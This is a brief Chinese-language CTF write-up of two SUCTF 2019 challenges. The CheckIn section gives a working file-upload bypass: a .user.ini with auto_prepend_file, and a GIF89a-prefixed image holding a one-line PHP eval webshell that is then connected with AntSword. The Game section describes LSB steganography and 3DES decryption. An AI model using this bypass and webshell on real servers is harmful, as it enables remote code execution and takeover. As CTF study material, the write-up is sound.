[SUCTF 2019]CheckIn

经过fuzz,发现<?被ban,可以通过<script language='php'><scirpt>绕过,同时上传的文件还要添加文件头,可以添加GIF89a绕过,上传一张图片发现文件夹下存在index.php,猜测可以使用.user.ini解析上传PHP后门:

首先上传.user.ini

1
2
GIF89a
auto_prepend_file=15h3na0.jpg

再上传一个名为15h3na0.jpg的图片马:

1
2
GIF89a
<script language='php'>eval($_POST["15h3na0"])</script>

上传成功,蚁剑连接:

参考链接:从SUCTF 2019 CheckIn 浅谈.user.ini的利用

[SUCTF 2019] Game

附件为一张png图片,使用工具操作一波后发现为LSB隐写,得到一段密码,尝试好久不知道是什么加密方式,后来查看Writeup才知道原来是3DES加密,但这题在BUUCTF上没有呈现完全,解密需要密钥,但密钥在原题中有体现,BUUCTF上面没有,拿了WP中的密钥解出了密码,得到flag。